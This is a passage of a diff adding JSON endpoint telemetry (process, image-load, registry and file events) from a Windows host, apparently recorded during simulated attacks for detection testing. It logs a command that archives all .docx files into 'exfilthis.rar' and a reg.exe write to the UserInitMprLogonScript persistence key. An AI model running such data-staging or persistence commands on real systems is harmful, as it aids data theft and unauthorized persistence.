"unique_ppid": "{42FC7E13-CBCD-5C05-0000-0010B0B25401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 6488, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883573253080000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6488, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883573253080000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6488, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883573253080000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6488, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883573253080000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6488, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883573253080000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 6488, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883573253080000, + "unique_pid": 
"{42FC7E13-CBCD-5C05-0000-0010A6B35401}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 6488, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883573253080000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6488, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883573253080000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6488, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883573253080000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" + }, + { + "event_type": "registry", + "pid": 6488, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Environment", + "registry_value": "Environment", + "timestamp": 131883573253230000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\Zvpebfbsg.JvaqbjfPnyphyngbe_8jrxlo3q8oojr!Ncc", + "registry_value": 
"Zvpebfbsg.JvaqbjfPnyphyngbe_8jrxlo3q8oojr!Ncc", + "timestamp": 131883573279020000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", + "registry_value": "HRZR_PGYFRFFVBA", + "timestamp": 131883573279020000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "file", + "file_name": "SVCHOST.EXE-CD4ED1A8.pf", + "file_path": "C:\\Windows\\Prefetch\\SVCHOST.EXE-CD4ED1A8.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573351680000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "file", + "file_name": "REG.EXE-26976709.pf", + "file_path": "C:\\Windows\\Prefetch\\REG.EXE-26976709.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573354020000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883573415119984, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + 
"process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883573415270000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883573415270000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", + "registry_value": "Input", + "timestamp": 131883573415270000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 5824, + "process_name": "SearchIndexer.exe", + "process_path": "C:\\WINDOWS\\system32\\SearchIndexer.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex\\NewClientID", + "registry_value": "NewClientID", + "timestamp": 131883573415270000, + "unique_pid": "{42FC7E13-B303-5C05-0000-0010823E0600}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo\\C9DD546D-51CE-5F51-47F7-F7BA79663637", + "registry_value": 
"C9DD546D-51CE-5F51-47F7-F7BA79663637", + "timestamp": 131883573415270000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 6488, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Environment", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Environment\\UserInitMprLogonScript", + "registry_value": "UserInitMprLogonScript", + "timestamp": 131883573444170000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" + }, + { + "event_type": "process", + "pid": 6488, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883573444170000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" + }, + { + "event_type": "process", + "pid": 4436, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573444170000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010B0B25401}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 2900, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573444370000, + "unique_pid": "{42FC7E13-CBE0-5C05-0000-001058C05401}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2900, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573444330000, + "unique_pid": 
"{42FC7E13-CBE0-5C05-0000-001058C05401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2900, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573444330000, + "unique_pid": "{42FC7E13-CBE0-5C05-0000-001058C05401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2900, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573444330000, + "unique_pid": "{42FC7E13-CBE0-5C05-0000-001058C05401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2900, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573444330000, + "unique_pid": "{42FC7E13-CBE0-5C05-0000-001058C05401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2900, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573444330000, + "unique_pid": "{42FC7E13-CBE0-5C05-0000-001058C05401}" + }, + { + "event_type": "process", + "pid": 2900, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573444330000, + "unique_pid": "{42FC7E13-CBE0-5C05-0000-001058C05401}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", + "registry_value": "cbjrefuryy.rkr", + "timestamp": 131883573445259984, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", + "registry_value": "HRZR_PGYFRFFVBA", + "timestamp": 131883573445259984, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"rar a -r exfilthis.rar *.docx\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 8008, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573450980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010D9EA5401}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 8008, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573450890000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010D9EA5401}" + }, 
+ { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 8008, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573450890000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010D9EA5401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 8008, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573450890000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010D9EA5401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 8008, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573450890000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010D9EA5401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 8008, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573450890000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010D9EA5401}" + }, + { + "event_type": "process", + "pid": 8008, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573451040000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010D9EA5401}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 4696, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573451150000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010EAEB5401}", + "unique_ppid": 
"{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4696, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573451040000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010EAEB5401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4696, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573451040000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010EAEB5401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4696, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573451040000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010EAEB5401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4696, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573451040000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010EAEB5401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4696, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573451040000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010EAEB5401}" + }, + { + "event_type": "process", + "pid": 4696, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573451200016, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010EAEB5401}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": 
"svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Wbem", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Wbem\\CIMOM", + "registry_value": "CIMOM", + "timestamp": 131883573453700016, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573454020000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573454020000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573454020000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573454020000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573454020000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + 
"registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573454020000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573454020000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573454020000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573454020000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573454020000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", 
